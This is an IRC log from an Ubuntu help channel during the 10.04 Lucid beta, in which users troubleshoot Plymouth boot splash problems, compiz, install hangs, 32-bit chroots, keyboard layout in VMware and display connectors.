shapeshiftaDr_Willis: im using it with an atenna05:44
xiambaxmy netbook remix running on a hdtv05:44
Dr_Willisyea - my old card - was befor they had HD tv/signals. its old analog.05:44
gartrali cant grab headers after downloading updated lists <never really knew what they were called>05:44
shapeshiftaDr_Willis: yea it can, it pop up a second app to scan channels, but only once05:44
shapeshiftai guess ill give mythbuntu chan a try05:45
dm_Has anyone else had their scrolling on their touchpad (laptop) stop working? I havent been able to find a bug on it, just curious before i look further into it06:02
Dr_WillisChecking my netbook...06:04
Dr_Willisworking here.. but ive not updated the netbook in a few hrs.06:06
ddecatordm_: not on ubuntu...circular scrolling always switches off after i come back from being suspended, but never no scrolling at all06:06
* ddecator had that a lot with windows though06:06
Dr_WillisIve not tried hibernate/suspend in ages. -  lately i just close the lid on the netbook and it totally hangs..06:07
Dr_Willisso ive got all that disabled06:07
DanaGThat's probably gnome-settings-daemon forcibly trampling on touchpad settings that were set elsewhere.06:13
darthanubisis plymouth working for nvidia users of the nvidia-current driver?06:16
ddecatordarthanubis: yes06:17
Dr_WillisI disabled it.. so im not sure. :)06:17
Dr_WillisMy nvidia systems are booting...06:17
ddecatorstill doesn't look very good, but it works for me06:17
darthanubisddecator, which graphics card?06:17
darthanubisI don't see anything upon boot06:17
Dr_Willisive noticved it will look good for a day or so.. then start looking all crappy..06:17
Dr_Willisthen vanish for a day..06:17
darthanubisjust some colors across the top of the screen06:17
darthanubisbut nothing I can mak out06:17
ddecatordarthanubis: nVidia Corporation G86 [GeForce 8400M GS]06:18
Dr_WillisI think the art people need to stop using so many dithered/gradiants.. they really show up badly at times.06:18
ddecatormine is a resolution issue06:18
Dr_WillisI think ive noticed the res being lower at shutdown also.06:18
ddecatoroddly, it looks fine when i boot my server (why does a server need plymouth?) which is an old desktop, but looks terrible on my new-ish laptop06:18
Blue11!plymouth | blue1106:19
Blue11for us uneducated types - what is plymouth?06:19
ddecatorBlue11: the lucid boot splash06:19
ddecatorthe purple screen that says ubuntu and has the changing dots during boot06:20
Blue11ddecator: i'll have to see if there's some documentation - thanks06:20
ddecatorBlue11: np06:20
DanaGNetworkManager: <WARN>  wireless_get_range(): (wlan0): couldn't get driver range information (95).06:20
DanaGNetworkManager: <WARN>  constructor(): (wlan0): Device unsupported, ignoring.06:20
DanaGGrr, stupid NetworkManager!06:20
Blue11ddecator: one last question - is plymouth unique to ubuntu, or?06:21
ddecatorBlue11: no, fedora uses it06:21
Blue11ddecator: thanks that will make it easier to find docs06:21
Dr_WillisFedora has been using it for some time now right?06:21
ddecatori think so06:21
* ddecator has never used fedora06:21
ddecatorthey have it actually working >.>06:22
ddecatorheh, everytime i start talking on here it turns into a plymouth discussion..06:23
DanaGPlymouth "works" for me... but refuses (yes, actively refuses) to show me a splash screen.06:23
Dr_WillisSuch a lovely tool.06:23
ddecatoryah, i'm skeptical it will work well on release..06:23
DanaGNice job, Plymouth.06:23
Dr_WillisIm betting we will have a delay  on release due to plymouth :)06:24
Blue11ddecator: found this:  http://www.thelinuxdaily.com/2008/11/how-to-enable-graphical-boot-with-plymouth-fedora-tip/06:24
Dr_WillisYou cant even uninstall it - last i tried...06:24
Blue11hmm maybe Ill leave well enough alone06:24
ddecatorthere is a way you can. people had to when there was the nasty "hit <enter> and logout" bug06:24
ddecatori don't even think delaying the release would be enough =p06:25
Dr_WillisYep. Sort of the feature they proberly shouldent of tried to put into a LTS...06:25
Blue11i think I'll not touch it then -- I wonder what the status of compiz is?06:25
ddecatorcompiz work fine for me06:25
Dr_Williscompiz is working here also06:26
Blue11i wil try re-enabling and see what happens06:26
Blue11nope didn't work06:27
Blue11right back to metacity06:27
* DanaG slaps plymouth with a serial cable06:28
ddecatorwell i use compiz with metacity...are you trying to get emerald to work?06:28
DanaGcompiz with metacity?  that's like saying you use milk with lemonade.06:28
Blue11ddecator: no, I am just trying to enable compiz via System/Preferences/Appearance/Visual effects06:29
DanaGor like saying you use a Ford with Chevi.06:29
ddecatorBlue11: try CCSM06:29
ddecatorDanaG: what's wrong with metacity? =p06:29
Blue11let me see if that's installed06:29
DanaGNothing wrong with metacity.06:29
DanaG"i use compiz with metacity" makes no sense.06:29
ddecatori use compiz for the effects and to make my workflow more productive. i don't need it to decorate my windows for me06:30
DanaGah, then you use compiz with gtk-window-decorator.06:30
Blue11i hate it when spelling counts06:30
DanaGor with "metacity themes"06:30
DanaG * Starting Network connection manager wicd06:30
DanaG   ...fail!06:30
DanaGyes, it literally said that.06:31
ddecatoryah i've seen that before, haha06:31
ddecatorit's red and everything =p06:31
DanaGNope, wasn't red... and it was on the left.06:31
DanaGNormally it should be ....               [fail]06:31
ddecatorah, yah, that's what i was thinking of06:31
Blue11ddecator: pardon my dumbness - but I have ccsm installed, now what?06:32
ddecatorBlue11: System > Preferences > CompizConfig Settings Manager06:33
ddecatorBlue11: use that to set some animations and such and see if that works06:33
Blue11ddecator: yeah I am there but what do I do when I am there.06:33
jatoohello, i'm trying to install ubutnu 10.04, but it get's stuck at the purple ubuntu screen with the 5 red/white dots indefinitely, can anyone help?06:33
ddecatorBlue11: try going to Animations and setting some for windows actions. or try enabling the Desktop cube06:34
ddecatorjatoo: plymouth..06:34
ddecatorhow is this going to be stable enough for an LTS? -_-06:34
jatooddecator: sorry? what's plymouth06:34
Dr_WillisYep - i imagine there will be a #ubuntu-plymouth channel :)06:34
ddecatorjatoo: that's the screen you're getting stuck at. does it say it's checking your disks for defects?06:35
ddecatorer, error06:35
Dr_Willisit gives you a pretty login 'experience'06:35
Blue11ddecator: i set some animations but it keeps going back to metacity...06:35
jatooah, doesn't say anything, just has those dots cycling red, white06:35
DanaGwlan0     Interface doesn't support scanning.06:35
ddecatorBlue11: are you trying to change the windows decorations? (i.e., the appearance of the title bar that has the buttons)06:35
DanaGnice job, kernel.06:35
ddecatorjatoo: hm, then idk. i have it say that it's checking for errors and then freeze, but pressing C solves that06:36
Blue11ddecator: no - just took what was there - it's all stock -- I do have this card (pretty old) 01:00.0 VGA compatible controller: ATI Technologies Inc Radeon RV100 QY [Radeon 7000/VE]06:36
Blue11 06:36
Blue11ddecator: I am using the generic drivers whatever comes with ubuntu06:36
ddecatorBlue11: then by "back to metacity" what do you mean exactly?06:36
jatooddecator: it's not actually freezing, the dots keep cycling, but doesn't go anywhere...06:37
ddecatorjatoo: is your HDD doing anything when it does that?06:37
Blue11ddecator: when I enable visual effects, and click on keep settings -- when I go back, it's set to no effects06:37
Ken8521how come you can't get in a public chat room w/ skype and ubuntu.06:37
Blue11ddecator: compiz works fine on my 9.10 system06:38
jatooddecator: hmmm it is at the moment but i just restarted it, i'll let it go for a while and see06:39
ddecatorBlue11: ah, someone else had that too, but i think that was with intel...i'm guessing you have 'xserver-xorg-video-ati' installed?06:39
Blue11but that's an nvidia card, and this is an ati card -- still compiz DID work on SuSE with this setup06:39
Blue11ddecator: how do I tell?06:39
ddecatorBlue11: can you check in synaptic?06:39
Blue11sure I just did a dpkg and got -- ii  xserver-xorg-video-ati                            1:6.13.0-1ubuntu5                               X.Org X server -- AMD/ATI display driver wrapper06:39
ddecatorso it's installed...06:40
ddecatoridk if there is a proprietary driver for ati06:40
ddecatoranyone else here with ati?06:40
DanaGstupid plymouth....06:41
DanaGmountall: Plymouth command failed06:41
Blue11yeah it's installed checked in synaptic06:41
DanaGlooping so fast on my beagleboard that it's using 100% cpu on the HOST SYSTEM's serial console!06:41
Blue11DanaG: owch!06:41
Blue11new idle task?06:42
ddecatori *really* hope the plymouth devs know what they need to do to get everything working for the release..06:42
Blue11oh I found a "performance" enhancement for thunderbird:  http://pkill-9.com/wordpress/?p=25006:43
SwedeMikeI was quite surprised at how much new stuff went into 10.04 considering it's LTS. Plymouth being one of them.06:44
DanaGI don't think highly of plymouth right now.06:45
ddecatorfew people do..06:45
Blue11DanaG: thanks for being the guinea pig!06:45
DanaGIn my case, it "works" fine... but doesn't do anything visible.06:46
DanaGApparently they think people who want a serial console IN ADDITION TO local display... can't possibly want a splash screen.06:46
Blue11DanaG: it's like homer saying: "It was delicious and not filling at all"06:46
ddecatori thought they wanted plymouth for a more "interactive" boot splash, but this one isn't very different from xsplash appearance-wise, and xsplash worked...and was faster for me06:47
itdockhello my friends :)06:49
Dr_Willisxplash was just a splash. it did not start up befor/during the normal boot process i thouight06:49
Dr_Willisdident it used to be    GRUB -> kernel -> usplash -> xsplash -> gdm -> xsplash -> desktop06:50
Dr_Willisnow its more like (i think)06:50
SwedeMikeI prefer less eyecandy and more "working"06:50
Dr_Willis   GRUB -> kernel ->  plymnouth (thats using x?) > gdm -> desktop06:50
jatooddecator: been going for 10 minutes now, and the dots are still changing, hdd light is still on - how long should it be taking?06:50
ddecatorDr_Willis: maybe, but it still takes longer with plymouth on my system..06:50
DanaGOn my netbook, plymouth works fine.  It's just the one with serial console that doesn't work.06:51
ddecatorjatoo: uh, depending on the system, a couple minutes..06:51
jatoohmm yeah...06:51
jatoosomething's up then i guess06:51
ddecatorand it definitely doesn't say anything about doing a filesystem check?06:51
jatoono text other than the ubuntu logo06:52
jatoois there a way i can switch to a terminal or something? some kind of output?06:52
ddecatorhm, does adding -no-splash to the end of the boot command disable plymouth i wonder?06:52
jatoooh, i'm booting from the installation cd06:52
jatooyeah, trying to install it...06:53
ddecatorso are you booting into a live session?06:53
ddecatorbtw, hey itdock06:53
jatoowell i don't know, it hasn't given me any options yet, just went from that first ubuntu splash to this one with the cycling dots06:53
itdockhey o.o06:54
ddecatorjatoo: so you never got a menu giving you the option to install or to run a live session?06:54
DanaGI also think the cycling dots look stupid.06:54
ddecatordid you do an md5sum of the disk?06:54
DanaGIf you interpret it as a progress bar... it loops from 0% to 100% and back again!06:55
Dr_Willisdots that dont really say uh of anything06:55
jatoono... i suppose i should do that06:55
Dr_WillisDanaG:  yep exactly06:55
DanaGAnd it does that both on bootup and shutdown.06:55
ddecatorjatoo: doesn't hurt =)06:55
Dr_WillisGotta love progress bars that dont really show progress06:55
DanaGIt's like a deranged progress bar.06:55
Dr_Willisive seen similer things on way to many other apps as well06:55
ddecatorxsplash did that too..06:55
DanaGIf you aren't going to show progress.. then you'd better damn well not look like a progress bar!06:55
ddecatori think it's supposed to make the boot seem quicker06:55
Dr_Willisi edited my xplash to show  a ...err.. wait this is a faimly channel.. :)06:56
DanaGTake the XP scrolly thing... it doesn't scream "I AM A PROGRESS BAR".06:56
jatooddecator: i tried to upgrade from 9.10 and it destroyed my system... windows 7 won't boot now do you have any idea of how i could save my windows installation?06:56
vishhehe DanaG ;p06:56
luciandoesn't show any progress bars for drive checks either, just some generic dot cycling too06:56
DanaGI don't mind non-showing of progress... but don't make a deranged "progress bar".06:56
ddecatorjatoo: boot into a live cd, see if you can mount the windows partition06:56
DanaGThat's just bad.06:56
DanaGEven Gnome's own human interface guidelines tell you not to do that.06:56
DanaGThe old usplash bouncing thingy was perfect.06:57
ddecatora rotating ubuntu logo would be nicer =)06:57
DanaGToo graphics-intensive, that would be.06:57
ddecatork yoda06:57
jatooddecator: yep, i've got 9.10 back on there now and all partitions are fine, from grub when i try to boot windows it juts restarts the computer and goes back to grub. i've tried changing the partition selected in the grub command, but no difference...06:58
ddecatorjatoo: and you can mount the windows partition in ubuntu?06:58
ubottuLaunchpad bug 553386 in kubuntu-default-settings "Plymouth theme should use circular progress indicator" [Medium,Confirmed]06:58
DanaGsee my comment on here, and the linked forum post.06:58
jatooddecator: yep06:58
martinerHello, is there anyone who has any information of when the MSN server change will be "fixed" so audio calls will work once again in the chatclients (emesene, empathy, amsn and so on)?06:59
ddecatorjatoo: that's odd...not sure how you would resolve that to be honest o.o06:59
jatooyeah :(06:59
ddecatori'm sure there is a way though06:59
ddecatori'm just not familiar with grub06:59
ddecatoror booting, haha06:59
jatooi tried reinstalling 9.10 and tried doing a windows recovery...06:59
jatooif i could just get win7 bootable again i'd be happy06:59
Dr_Willisboot win7 cd and try fixing the bootloader of windows first...07:00
Dr_Willisthen try getting grub2 back on07:00
jatooDr_Willis: tried doing that, windows cd thinks the installation is fine07:00
Dr_Willisyou had windows remove grub then?07:00
Dr_Willisand uswed the windows bootloader?07:01
bicchiCould anyone tell me what is the name of the default theme that Lucid uses? Appearance Preferences -> Theme07:01
Dr_Willisbicchi:  radience i think07:01
ddecatorradiance or ambiance07:01
Dr_Willis'song-and-dance' :)07:01
ddecatorwhichever the dark one is07:01
jatooDr_Willis, no i just tried to do the restore for an unbootable windows thing from the windows cd - how can i get windows to remove grub?07:01
om26erthe latest git version of gnome shell brings window controls to the right, I say what the?07:01
Dr_Willisjatoo:  no idea on win7 - ms changes it every time they come out with a new vesion07:02
Dr_WillisIn the Uubntu netbook  version. the 'close' button is basically in the middle of the titlebar/top panel :)07:02
ddecatorwith gnome shell?07:03
Dr_Willisis gnome-shell actaually installable now? last few weeks its been broken07:03
ddecatoridk, i haven't tried it in months. last time i tried i had trouble switching back, so i've avoided it, haha07:04
Dr_Willisddecator:  yep - lubuntu seems to cause more problems then its worth also07:04
Dr_WillisThe whole use of 'whatever-desktop' meta packages - is getting rather .... cluttered and problematic07:04
ddecatorwell lubuntu is still early in development07:05
ddecatornot even an official *buntu flavor yet07:05
Dr_WillisI thoguht i saw some tool that monitors installs of various packages.. to make removing them easier.. but i cant rember what/where i saw it at07:05
Dr_Willisgnome and kde aso have issues where they step on each others toes a lot. :)07:06
om26erpreviously shell did not move the buttons to the right. I think they did that opposed to ubuntu. /me can bet on that07:06
Dr_Willistoss in xubuntu and it gets even worse07:06
om26erafter all they are redhat guys ;-) (most)07:06
ddecatorDr_Willis: well typically people use one and stick with it, maybe just borrowing apps from the others =p07:06
ddecatorom26er: maybe, or it could be like we had for a bit and a package accidently caused it to change07:07
Dr_Willisddecator:  actually i find (around here) that the kids want one.. mom wants a differnt one.. and i use the others. :)07:07
Dr_WillisThe netbook interface is gaining popularity.07:07
ddecatorah, multi-user comps...yah i guess that's true, i'm used to it just being me on here =p07:07
om26erfor maverik they are revamping the netbook interface. what can be expected. no panels?07:08
ddecatorthe whole "which *dm should win" thing is annoying..07:08
ddecatorom26er: they are?07:09
om26erddecator, sabdfl said that when he announced maverik07:09
Dr_Willisjust now on the netbook.. i had KDM on console 1.. and lxdm on console 607:09
Dr_Willis the login screen tools.07:10
Dr_WillisTHEN ya got issues with using gdm to start kde, or kdm to start gnome,, or lxdm starting anytying ..07:10
ddecatorom26er: heh, never read all of that =p07:10
jatooi did the md5sum on my cd, it said one file couldn't be read but all others passed...07:10
om26er"We have a continued interest in netbooks, and weโ€™ll revamp the Ubuntu Netbook Edition user interface"07:10
ddecatorhuh, nice07:10
ddecatorjatoo: did the output numbers match the ones given on the site?07:11
jatooah well i did it for the downloaded iso and the thing matched, the cd was an automatic thing where it compared it to its own list07:12
ddecatoroh. any idea what file it couldn't read?07:12
jatoocould that be a problem?07:13
ddecatorno idea what it does, but 'filesystem' in there makes me think it's important, heh07:13
ddecatorif that's used during boot, that could potentially be the problem..07:13
jatooi'll burn another copy07:14
ddecatorif you have extra CDs lying around, you can burn another using the slowest speed07:14
Dr_Willisi alwyas seem to make bootable flah drives these days. i got one pc that dont like some of them however.07:16
ddecatornot all comps can boot from USB though07:16
ddecatorit's a nice option if they can07:16
jatoohow do you create them? brasero?07:17
ddecatorSystem > Administration > Startup Disk Creator07:17
ddecatoryou might have to adjust the BIOS on the computer you'll boot on though. some don't have USB checked before the local drive07:18
ddecatorheck, the desktop i used to make a server didn't even have the CD-ROM checked before the local drives07:19
Peddywhat's the state of multiple wallpapers in Lucid? Still broken?07:19
ddecatoron multiple screens or multiple wallpapers that transition on one screen?07:20
Dr_WillisHmm.. converted a lot of videos for my portable player.. and  it included the subtitles.. now annoying07:22
Dr_WillisMy little netbook just has a hard time playing someof these hd mkvs and so forth got to convert them :(07:23
Peddyddecator, multiple wallpapers.07:29
Peddyddecator, multiple wallpapers for different workspaces07:29
ddecatorno idea. idk how you set that up even when it is working, heh07:30
Dr_WillisHmm - i really cant figure out handbrake.. or else its..  got issues.. :)07:41
Dr_WillisThe start encoding button never gets activated07:41
ddecatorworked for me before, but idk that i've used it since upgrading to lucid..07:44
phani๏ปฟHi... I have just installed lucid lynx on vmplayer 3.0.1 and its successful.. however i can't use my keyboard to login ...any ideas what might be wrong ?07:48
Dr_Willisive never used vmplayuer or vmwre lately.. so not really07:51
lapiongrmbl.. blacklisting of i855,845 and 835 in latest kernel update07:52
jatooburnt another disc and this one passed everything... now instead of cycling through the dots indefinitely it freezes with them all red... no cd or hdd activity08:03
ddecatorheh, that's no better..08:03
lapionis your video chipset an intel or radeon chipset ?08:04
ddecatordid you burn the daily iso or the beta 2 iso?08:04
jatooah, i have an nvidia card - is that intel?08:04
jatoobeta 2 iso08:04
Dr_WillisErr.. nvidia card is nvidia...08:04
ddecatorshould work fine then..08:04
lapionI am having even worse problems with i91508:05
Dr_WillisI wonder if the alterantive installer cd has plymouth on it. :)08:05
h00kDr_Willis: I don't think it does, no08:05
jatoowhat is 'alternative'?08:05
Dr_Willisalteranive installer = the text based install cd with no live-desktop feature08:06
Dr_Willisgood for problem machines08:06
jbuncheranyone having issues installing gnome-shell from the repositories?08:06
Dr_Willisits been uninstallable for the last few weeks jbuncher  - not sure if its been fixed yet or not08:07
Dr_Willishe following packages have unmet dependencies:08:07
Dr_Willis  gnome-shell: Depends: libgjs0 but it is not going to be installed08:07
Dr_Willissame issue for the last week+08:07
jbuncherlooks like libgjs0 depends on an older version of xulrunner so it's causing issues08:08
Dr_WillisYep. been that way for some time now08:08
jbuncherwell dang08:09
jbuncherthat is a bummer08:12
Dr_Willisyep - and they got like   a few weeks now to fix it. :)08:13
Dr_Willisclock is ticking08:13
paperhaps its a bug? there is no partimage for ubuntu x6408:26
pais it possible to force installation of a i386 package on a x64 ubuntu_08:26
Dr_Willisproberly..but it may not work properly08:27
Dr_Willis!find partimage08:27
ubottuFound: partimage, partimage-doc, partimage-server08:27
Dr_Willis!info partimage08:27
ubottupartimage (source: partimage): backup partitions into a compressed image file. In component universe, is optional. Version 0.6.8-1 (lucid), package size 276 kB, installed size 968 kB08:27
Jordan_UYup, http://packages.ubuntu.com/lucid/partimage only has i386 for some reason08:28
pamaybe i can try to compile_08:28
Dr_WillisYep. wonder why..  Ive no idea08:29
ddecatoryou can use getlibs to make 32-bit only software work on 64-bit, but it's usually buggy08:29
Dr_Williscould be it has 64bit compileing issues08:29
Jordan_UIn karmic too08:29
DanaGgetlibs is good for upgrading mesa 32-bit libs from xorg-edgers.08:29
ddecatori had to use getlibs when boxee was 32-bit only08:29
LordKowand schroot is a complete failure at completely mimicking 32-bit08:30
LordKowno way qt is ever going to compile.08:30
joaopintoschroot is quite good for having a complete 32bits environment08:31
joaopintoqt builds fine on a 32bits environment, just as anything else08:32
ddecatorchroot is a pain to setup just to run a 32-bit app though..08:32
joaopintoddecator, not for testing, it can be built with a single command, but I agree, it's not for the day to day use :)08:32
ddecatortook me a couple hours to set it up for building 32-bit packages =p08:33
joaopintoddecator, that's because you are not familiar with schroot_build.py :P08:33
Jordan_Uddecator: For just building you can use gcc-multilib08:34
ddecatorjoaopinto: i was following a wiki for how to set it up. the majority of the time was spent installing the necessary packages in the environment for building..08:34
LordKowjoaopinto: well obviously its not complete enough because qt is mistaking this 32-bit schroot for 64-bit.08:34
DanaGhmm, try linux32?08:35
DanaG!info linux3208:35
ubottuPackage linux32 does not exist in lucid08:35
LordKowlinux32 chroot or linux32 dchroot both result in the same issue08:35
paim not so sure ubuntu amd64 is such a good idea08:36
LordKow"/usr/bin/ld: skipping incompatible /usr/lib/gcc/i486-linux-gnu/4.4.3/libstdc++.a when searching for -lstdc++" :-/08:36
LordKowi better check to make sure qt will compile with gcc 4.408:36
LordKowwait, i know it will. i just compiled it 64-bit.08:37
joaopintoLordKow, that is because you don't know how to set it up properly08:37
joaopintoLordKow, you must specify personality=linux32 on your schroot config section08:37
joaopintopa, why not ?08:38
LordKow[lucid]description=Ubuntu Lucid i386location=/var/chroot/lucid-i386priority=3users=dokogroups=sbuildroot-groups=rootpersonality=linux32aliases=dokochroot,default08:38
joaopintothere are rare cases for the need of closed source 32 bits binaries08:38
LordKowi followed https://wiki.ubuntu.com/DebootstrapChroot precisely as written.08:39
joaopintoLordKow, I can assure you that QT and any other libs builds fine on a properly configured chroot08:39
pajoaopinto, well for instance there are such packages not available for amd6408:39
joaopintopa, there are no packages on the repositories which do not run on amd6408:40
LordKowthis is not my first chroot. up until lucid i've never had issues compiling qt in a 32-bit chroot.08:40
Jordan_Ujoaopinto: Except apparently partimage.08:40
pajoaopinto, we just found one08:40
joaopintoLordKow, you must be missing something, if you want try my script: bzr branch lp:debfactory; sudo debfactory/bin/schroot_build.py08:40
joaopintoJordan_U, uh, it's missing ?08:41
Jordan_Ujoaopinto: http://packages.ubuntu.com/karmic/partimage08:41
LordKowi'll create a new one from scratch and see if it makes a difference.08:41
joaopintoJordan_U, ah :\, and it doesn't run with ia32-libs ?08:41
joaopintoJordan_U, I guess no one care enough about it :P08:41
Jordan_Ujoaopinto: I don't know.08:42
joaopintoit should run with ia32libs08:42
pazsnes is another one08:42
joaopintothose are exotic packages :P08:42
pamaybe.. but  i think ill stay i386 on my laptop : )08:43
giantpunehey guys.  ive just installed ubuntu 10.4 in vmware and im having a little issue.  maybe somebody knows the answer.08:44
giantpunethe installer didnt let me select which keyboard layout to use.  so im stuck with no desktop and trying to figure out how to change the keyboard layout in the terminal08:45
pawhere can i remove all the visual effects? only in preferences->appearence_08:45
giantpuneany ideas?08:45
palike the zooming when i hide a window08:46
jbuncherpa : install compizconfig-settings-manager08:47
Jordan_Upa: jbuncher: You don't need to install anything to *disable* compiz.08:47
pahow can i disable compiz?08:48
jbuncherJordan_U, from what I can tell, he just wants to tweak some specific settings08:48
Jordan_Upa: Like you thought, it's in System > Preferences > Appearance In the Desktop Effects tab08:48
Dr_Willisfusion-icon tool lets you easially disable/reenable compiz08:48
paJordan_U, well, i put to none08:48
pabut i still have some08:48
palike this zooming when i lower a window08:48
Dr_Willisthats a gnome/metacity  feature perhaps?08:48
pai see08:49
Dr_Willistry 'metacity --replace'   that should totally turn off compiz also08:49
pacan i do while i have gnome running_08:49
Dr_Willisgnome/metacity has had a silly animation whenit mimized08:49
Jordan_Upa: Do you mean just the outline of the window zooming?08:49
Dr_Willispa:  err.. yes. :) it dont do much good torun that command without it running08:49
Dr_WillisThats not compiz08:50
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DanaGSometimes when I log in, compiz is running, yet gtk-window-decorator is not.08:53
Dr_Willisyep - im amazed that compiz works as well as it does.. :)08:53
Jordan_Upa: It looks from gconf like there is no way to change that. Mybe XFCE or another window manager will act how you want (and be lighter)08:53
phani๏ปฟDr_Willis: I have made it work with vmplayer + lucid lynx I used the on screen keyboard for ubuntu and logged in and i found that /etc/default/console-setup file is culprit08:54
DanaGNo way to change what?08:54
LordKowjoaopinto: if im following schroot_build.py correctly it should do everything i did and nothing more08:54
DanaGcheck in gconf under /apps/metacity08:54
paok, but now i try the i386 first of all : )08:54
DanaGthere's a "low resources" mode of some sort.08:54
phanithe problem is for the keyboard under the option  "XKBMODEL="Skip" .. so, i have change to pc105 and a restart fixed the issue08:55
joaopintoLordKow, yes08:55
paDanaG, where do you mean?08:55
* Dr_Willis tries hard to rember what phani's actual problem was.. :) plymouth?08:55
joaopintoLordKow, it setups a schroot specifically for building08:56
DanaGSomewhere under there is random stuff.08:56
panow linux has something like a registry08:56
LordKowjoaopinto: yea i didnt miss build-essential08:57
Ken8521pa, linux has had gconf-editor for a long time08:58
paDanaG, that made the trick08:59
DanaGActually, that's Gnome, more specifically.08:59
Blue11what does it mean when they say the driver has been moved to a legacy support driver?09:00
Ken8521does KDE have something like gcnof-editor?  i hate kde, just curious09:00
Dr_WillisBlue11:  in ati's case - it means ati stopped supporting it and dumped the work off to the linux devs..09:00
Blue11Ken8521: like they say -- there's no place like gnome - I don't know09:00
Dr_WillisKen8521:  not that ive seen09:01
Blue11Dr_Willis: how did you know that I was looking at the ati site?  must be a mind reader.09:01
Dr_WillisBlue11:  because ati  has constantly promised better support.. and that seems tobe their answer...09:01
phaniDr_willis: my problem was can't use keyboard vmwareplayer + lucid lynx09:01
Blue11Dr_Willis: gonna see what a cheap nvidia card would run09:02
Blue11looks like I can get a used 8400 for $2009:05
Dr_WillisYep. its amazing the cards you an get  these days.09:05
Dr_WillisTomshardware and other hardware sites summed it up..09:06
Blue11oops pci09:06
Dr_Willis'mainstream pcs - now have enough power to play most all games - at decent settings'09:06
Dr_WillisIts hard for me to justify a $200+ video card.09:06
Blue11is dvi out hdtv?09:07
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Dr_Willismost HDTV's these days have hdmi in09:08
Dr_Willishdmi is   whats replaceing dvi09:08
Blue11no no this card has dvi - I don't know what that means09:08
Dr_Willisdvi is the  digital cnector.09:08
Dr_Willisvga -> dvi -> hdmi09:08
Dr_WillisYou want to NOT use vga these days.. unless you have to09:08
Blue11so it would not hook up to a digital monitor09:09
Ken8521dmi is the white one, several female holes in it.09:09
Blue11this is what I am lookin at:  eVGA  e-GeForce 6200LE - Graphics adapter - GF 6200LE - AGP 8x - 256 MB DDR2 -  DVI - TV out09:09
Dr_Willisdvi is for digital monitors.. yes09:09
Dr_Willisit has a dvi and a tv out conectors09:09
Blue11okay then I just would need a dvi kvm switch09:09
Dr_Williskvm switches.. Ugh. :)09:09
Mighty_PenguinDr_Willis, whats wrong with vga?09:09
Dr_WillisMighty_Penguin:  it looks like... poo. :)09:09
Dr_Williscompared to the same setup with dvi.09:10
Ken8521Mighty_Penguin, lol, just dated09:10
Blue11my netbook has vga out - it looks great on my hdtv actually09:10
Ken8521Dr_Willis, i dn't think vga looks to bad, but...09:10
Mighty_PenguinI honestly don't get it then, I'm fine using vga on my 28"09:10
Dr_WillisKen8521:  ive set upidentical monitors/machines trying the differnet ports.. and i could tell the diff.09:10
Blue11i have a 19 incher here and it works very well09:10
Ken8521why does skype keep giving me an "immediate attention/urgan system scan" notice.. saying i have a virus or malware, i'm not using Windows, can I turn that off09:10
Dr_WillisPlus  ive had a great more problems with X getting wrogn modes and stuff with VGA09:10
Moo-Crumpushi, I could need some help. My wife updated her laptop from karmic to lucid, and gnome does not start up anymore. /etc/init/gdm.conf is of size ???? and owned by ????. I still can login to console, and can startx as sudo. Then x starts gnome. It would be nice if someone could send me a current /etc/init/gdm.conf.09:10
Dr_Willisswitched over to dvi and things work a lot better.09:10
Ken8521Dr_Willis, i have no doubt, side by side, you could tell a difference09:11
Dr_WillisRule of thumb - USE DVI if you can.09:11
Blue11Moo-Crumpus: i had the same problem - nuking the .gconf files fixed it.09:11
Dr_Willismany newer cards got hdmi :) thats  even more fun.09:11
Mighty_PenguinI've actually made it a point not using dvi just cause lol, I've never used it, and I'm gonna start using hdmi in a little bit09:12
Blue11dvi would work thenank09:12
Moo-CrumpusBlue11, but the gdm.conf is still broken, then. Which .gconf files have to be nuked? I don't know ubuntu very well.09:12
Dr_Willisive had to hammer this hard-core gamer (at work) over and over telling him to use dvi.. he was using vga still when he had dvi pc/monitors..  he finally  dug out the dvi cable.. and next day he was .. 'why dident i switch earlier!'09:13
Blue11!pastebin | blue1109:13
ubottuBlue11, please see my private message09:13
Dr_WillisThe only real reason i can think of to stuck with VGA is for use with some of those KVM switches09:13
Blue11Moo-Crumpus: here:  http://paste.ubuntu.com/416542/09:13
Blue11Dr_Willis: my kvm switch audio as well09:14
Blue11but it's vga09:14
Dr_WillisIve not checked prices on dvi KVM's lately09:14
Dr_WillisBlue11:  it is PS2 also ? :)09:14
C-S-B-N900Dr_Willis: why would you choose vga over dvi?09:15
Dr_WillisC-S-B-N900:  if your kvm switch supports ONLY vga09:15
Blue11Dr_Willis: it does ps/2 -- I guess it would do at if you had adapters09:15
Moo-Crumpusthank you, I will restart, and have a look. I guess, with /etc/init/gdm.conf gdm should just start up after booting?09:15
C-S-B-N900by a new kvm lol.09:15
Dr_WillisC-S-B-N900:  last i checked dvi kvm's were very pricy09:16
Blue11Dr_Willis: yeah that's stopped me.09:16
Dr_Willisi dont use kvm's they often cause to many problems09:16
C-S-B-N900there are cheaper options than a kvm that will do for a lot of instances.09:17
Mighty_Penguin:o finally they updated the wallpapers :D09:17
Blue11wowsers - the dvi version of what I have for the vga is over $80 -- i payed like 25 for these09:17
Dr_WillisBlue11:  Bingo!09:18
DanaGKVVM tends to break EDID.09:19
Dr_WillisDanaG:  yep. that can be a big issue09:20
C-S-B-N900Pretty sure my plymouth still isnt working. could my encrypted lvm be a prob?09:22
Blue11C-S-B-N900: should have got a buick09:23
C-S-B-N900i dont know my american motors...09:24
* Dr_Willis works for Chrysler09:24
C-S-B-N900or like.09:24
Blue11nytol (good night all)09:29
Dr_Willisweirdness.. cleaning out a HD.. and i got a .fuse_hidden000db600005 file that i cant delete.. i delete it - it comes back witha  different #09:34
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Mianjoaopinto, good morning, I am back09:38
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joaopintoMian, hey09:50
joaopintoMian, I have found how to start upstart without running all the services09:51
Dr_Williswhouldent that be 'notstart' then? :)09:51
joaopintoDr_Willis, right :) if there was such an option :P09:52
joaopintoMian, ready ?09:54
Mianjoaopinto, almost yes09:55
syddrafI am running Lucid Beta 2, and my networking has failed using a wired connection. The Windows boot on the same machine works fine using the wired connection. What can I do to troubleshoot this?09:56
joaopintoMian, before we do that, do you have any detail about the "unable to install" problem ?09:57
joaopintoas it might be related09:57
Mianjoaopinto, yes I reported it using apport as the crash report automatically detected09:57
joaopintoMian, there was a crash ?09:58
Mianjoaopinto, I'll find the bug url now09:58
joaopintogrrr, i need to write down your bug nrs :)09:59
Mianjoaopinto, here is the report generated and sent automatically when I tried to install lucid from usb flash https://bugs.launchpad.net/ubuntu/+source/console-setup/+bug/56539210:00
